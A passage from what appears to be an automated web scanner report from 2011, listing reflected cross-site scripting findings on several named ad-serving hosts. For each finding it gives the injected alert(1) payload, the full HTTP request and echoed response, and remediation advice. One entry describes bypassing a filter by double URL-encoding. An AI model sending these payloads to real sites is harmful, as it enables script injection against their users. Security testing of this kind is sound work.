GET /adj/iblocal.hearsttv.wptz/index26096'-alert(1)-'66ba3d012db;kw=containerlinkswelike;pos=1;sz=253x300;ord=8710159196052700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1289

document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n    <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n        ');

docu
...[SNIP]...
<scr'+'ipt type="text/javascript" src="http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/index26096'-alert(1)-'66ba3d012db;kw=linkswelike;sz=88x31;pagepos=1;pos=1;tile=1;ord=6814682?">
...[SNIP]...
1.14. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6665e'%3balert(1)//5533bfaa5b9 was submitted in the kw parameter. This input was echoed as 6665e';alert(1)//5533bfaa5b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.homepage/local;kw=6665e'%3balert(1)//5533bfaa5b9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 468
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:30:04 GMT
Expires: Sat, 09 Apr 2011 12:30:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/t;238193711;0-0;0;12662198;3454-728/90;41302796/41320583/1;;~okv=;kw=6665e';alert(1)//5533bfaa5b9;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home">
...[SNIP]...
1.15. http://ad.doubleclick.net/adj/ibs.pla.homepage/local [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.homepage/local

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b456d'-alert(1)-'b6a2f49202b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.homepage/local;kw=homepage+banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;ord=1302352178986?&b456d'-alert(1)-'b6a2f49202b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 487

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/n;238193711;1-0;0;12662198;3454-728/90;41550499/41568286/1;;~okv=;kw=homepage banner1;comp=false;ad=true;dcopt=ist;pgtype=index;tile=1;sz=728x90;;b456d'-alert(1)-'b6a2f49202b=1;~aopt=2/2/2670/0;~sscs=%3fhttp://www.spherion.com/burlington-vt">
...[SNIP]...
1.16. http://ad.doubleclick.net/adj/ibs.pla.news/local [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ibs.pla.news/local

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 932ae'%3balert(1)//f0c51e288f7 was submitted in the kw parameter. This input was echoed as 932ae';alert(1)//f0c51e288f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ibs.pla.news/local;kw=932ae'%3balert(1)//f0c51e288f7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 468
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:30:17 GMT
Expires: Sat, 09 Apr 2011 12:30:17 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/u;238193711;0-0;0;12657116;3454-728/90;41302796/41320583/1;;~okv=;kw=932ae';alert(1)//f0c51e288f7;~aopt=2/2/2678/0;~sscs=%3fhttp://www.spherion.com/corporate/officelocator/officedetails.jsp?office_id=4232&contentpage=home">
...[SNIP]...
1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 323a7%2522%253balert%25281%2529%252f%252f80464a2a6d5 was submitted in the REST URL parameter 2. This input was echoed as 323a7";alert(1)//80464a2a6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357323a7%2522%253balert%25281%2529%252f%252f80464a2a6d5/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357323a7";alert(1)//80464a2a6d5/779.0.js.88x31/1302538905**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678
...[SNIP]...
1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65205%2522%253balert%25281%2529%252f%252f8a3c794d307 was submitted in the REST URL parameter 3. This input was echoed as 65205";alert(1)//8a3c794d307 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x3165205%2522%253balert%25281%2529%252f%252f8a3c794d307/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x3165205";alert(1)//8a3c794d307/1302538908**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%
...[SNIP]...
1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 301ef"-alert(1)-"d146c56c313 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f301ef"-alert(1)-"d146c56c313 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1750

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
click.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f301ef"-alert(1)-"d146c56c313">
...[SNIP]...
1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10881"-alert(1)-"80d49f0fc0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f&10881"-alert(1)-"80d49f0fc0a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1753

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
lick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f&10881"-alert(1)-"80d49f0fc0a=1">
...[SNIP]...
1.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ac8"-alert(1)-"0ebbe4f0048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=10&ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html&f4ac8"-alert(1)-"0ebbe4f0048=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; ih="b!!!!)!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; vuday1=d-=>Rd-=>R!4)FWKw-DF; BX=265jgc96pflsl&b=4&s=b9&t=92; liday1=fh'jT$o@U<!4)FWqJ%Ow

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:01:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:01:39 GMT
Pragma: no-cache
Content-Length: 4410
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=728x90&anmember=541&anprice=10&f4ac8"-alert(1)-"0ebbe4f0048=1&referrer=http%3a%2f%2fwww.foxnews.com%2fpolitics%2findex.html&s=1836970&_salt=2073956677";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_d
...[SNIP]...
1.22. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b71'%3balert(1)//052d30bafe5 was submitted in the admeld_adprovider_id parameter. This input was echoed as e8b71';alert(1)//052d30bafe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78e8b71'%3balert(1)//052d30bafe5&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:26 GMT
X-Name: rtb-o05
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78e8b71';alert(1)//052d30bafe5&external_user_id=0&expiration=1302798086" alt="" />');
1.23. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23569'%3balert(1)//b87386ea441 was submitted in the admeld_callback parameter. This input was echoed as 23569';alert(1)//b87386ea441 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

